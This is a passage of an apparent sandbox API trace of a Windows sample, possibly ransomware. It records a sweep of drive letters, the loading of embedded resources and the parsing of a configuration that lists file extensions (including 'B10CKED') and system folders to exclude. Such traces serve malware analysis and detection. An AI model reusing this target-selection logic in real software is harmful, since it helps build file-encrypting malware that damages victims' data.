returned 0x1 [0174.966] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0174.966] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0174.967] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0174.967] GetDriveTypeW (lpRootPathName="P:\\") returned 0x1 [0174.967] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0174.967] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0174.967] GetDriveTypeW (lpRootPathName="M:\\") returned 0x1 [0174.967] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0174.967] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0174.967] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0174.968] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0174.968] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0174.968] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0174.968] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0174.968] GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0174.968] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0174.968] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0174.968] FindResourceW (hModule=0x400000, lpName="NDNF", lpType=0xa) returned 0x51c420 [0174.968] LoadResource (hModule=0x400000, hResInfo=0x51c420) returned 0x516824 [0174.968] SizeofResource (hModule=0x400000, hResInfo=0x51c420) returned 0x267 [0174.968] LockResource (hResData=0x516824) returned 0x516824 [0174.969] FreeResource (hResData=0x516824) returned 0 [0174.969] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0174.969] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0174.969] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0174.969] LockResource (hResData=0x50d64c) returned 0x50d64c [0174.969] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0174.969] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x140deac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0174.969] FreeResource (hResData=0x50d64c) returned 0 [0174.969] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0174.969] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x141500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0174.969] GetCurrentThreadId () returned 0x728 [0174.969] GetCurrentThreadId () returned 0x728 [0174.969] GetCurrentThreadId () returned 0x728 [0174.969] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13a0128, cbMultiByte=615, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 615 [0174.969] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13a0128, cbMultiByte=615, lpWideCharStr=0x13ac65c, cchWideChar=615 | out: lpWideCharStr="[NF_START]\r\nAST\r\nAFN\r\nELST\r\nEXE\r\nLNK\r\nHTA\r\nPEK\r\nSEK\r\nB10CKED\r\nTMP\r\nICO\r\n000\r\nSYS\r\nDAT\r\nRTF\r\nINF\r\nDLL\r\nDAT\r\nREG\r\nDRV\r\nDEV\r\nPIF\r\nMBR\r\nINI\r\nXML\r\nLIST\r\nTTF\r\nLOG\r\nJA\r\nCOM\r\nBAT\r\nCMD\r\nVBS\r\nJS\r\nCFG\r\nDOWNLOAD\r\nNFO\r\nMSI\r\nCHK\r\nDMP\r\nMUI\r\nDUN\r\nISP\r\nISW\r\nCAB\r\nEFI\r\nHLP\r\nMSU\r\nHLP\r\nBIN\r\nLNG\r\nTORRENT_INFO\r\nTORRENT\r\nHTM\r\nHTML\r\nCHM\r\nLANG\r\nSTYLE\r\nMP3\r\nFLAC\r\nOGG\r\nWMA\r\nGIF\r\nJAVA\r\nCUR\r\nANI\r\n[NF_END]\r\n[ND_START]\r\n\\WINDOWS\r\n\\PROGRAM FILES\r\n\\GAMES\r\n\\APPDATA\\\r\n\\APPLICATION DATA\\\r\n\\LOCAL SETTINGS\\\r\n\\TEMP\\\r\n\\PROGRAMDATA\\\r\n\\BOOT\\\r\n\\MSOCACHE\\\r\n\\DEFAULT USER\\\r\n\\SAMPLE\r\n\\EXAMPLE\r\n\\I386\r\n\\TEMPORARY\r\n\\TOR BROWSER\\\r\n\\BROWSER\r\nBROWSER\\\r\n[ND_END]") returned 615 [0174.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_START]", cchCount2=10) returned 2 [0174.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 2 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 2 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0174.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, 